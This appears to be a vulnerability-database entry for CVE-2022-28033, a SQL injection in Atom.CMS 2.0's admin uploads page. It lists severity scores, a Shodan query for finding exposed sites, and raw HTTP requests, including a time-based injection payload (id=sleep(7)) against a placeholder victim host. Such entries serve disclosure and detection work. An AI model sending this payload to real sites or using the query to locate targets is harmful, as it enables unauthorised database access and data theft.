| Title | Atom.CMS 2.0 - SQL Injection |
|---|---|
| Author | ritikchaddha |
| Severity | Critical |
| Impact | Successful exploitation could lead to unauthorized access, data leakage, and potential data manipulation. |
| Remediation | Apply the latest security patches provided by the vendor to mitigate the SQL Injection vulnerability in Atom.CMS 2.0. |
| CVSS Score | 9.8 |
| EPSS Score | 0.58383 |
| CVE ID | CVE-2022-28033 |
| CWE ID | CWE-89 |
| Shodan Query | html:"atomcms" |
| Tags | cve cve2022 atom cms sqli vuln |
Atom.CMS 2.0 is vulnerable to SQL Injection via Atom.CMS_admin_uploads.php which allows an attacker to execute arbitrary SQL commands.
GET / HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/113.0
Connection: close
Accept-Encoding: gzip
GET /admin/uploads.php?id=sleep(7) HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) ConnectPC Safari/537.36
Connection: close
Accept-Encoding: gzip
🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2022/CVE-2022-28033.yaml
🦈 Packet Capture: ⬇️ Download cve-2022-28033.pcap
N/AN/A